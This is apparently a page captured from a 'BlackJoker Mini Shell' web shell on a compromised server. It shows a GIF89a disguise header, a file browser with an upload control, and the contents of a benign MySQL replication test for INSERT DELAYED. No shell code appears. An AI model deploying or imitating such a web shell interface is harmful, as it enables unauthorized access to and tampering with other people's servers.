GIF89a; Mini Shell

Mini Shell

Direktori : /usr/share/mysql-test/extra/rpl_tests/
Upload File :
Current File : //usr/share/mysql-test/extra/rpl_tests/rpl_row_delayed_ins.test

# See if INSERT DELAYED gets replicated
# Only in row-based, as we do SHOW BINLOG EVENTS

-- source include/not_gtid_enabled.inc
-- source include/have_binlog_format_row.inc
-- source include/master-slave.inc

connection master;
let $VERSION=`select version()`;
eval create table t1(a int not null primary key) engine=$engine_type;
insert delayed into t1 values (1);
insert delayed into t1 values (2);
insert delayed into t1 values (3);
flush tables;
SELECT * FROM t1 ORDER BY a;
sync_slave_with_master;

SELECT * FROM t1 ORDER BY a;
connection master;
drop table t1;

--source include/rpl_end.inc

./BlackJoker Mini Shell 1.0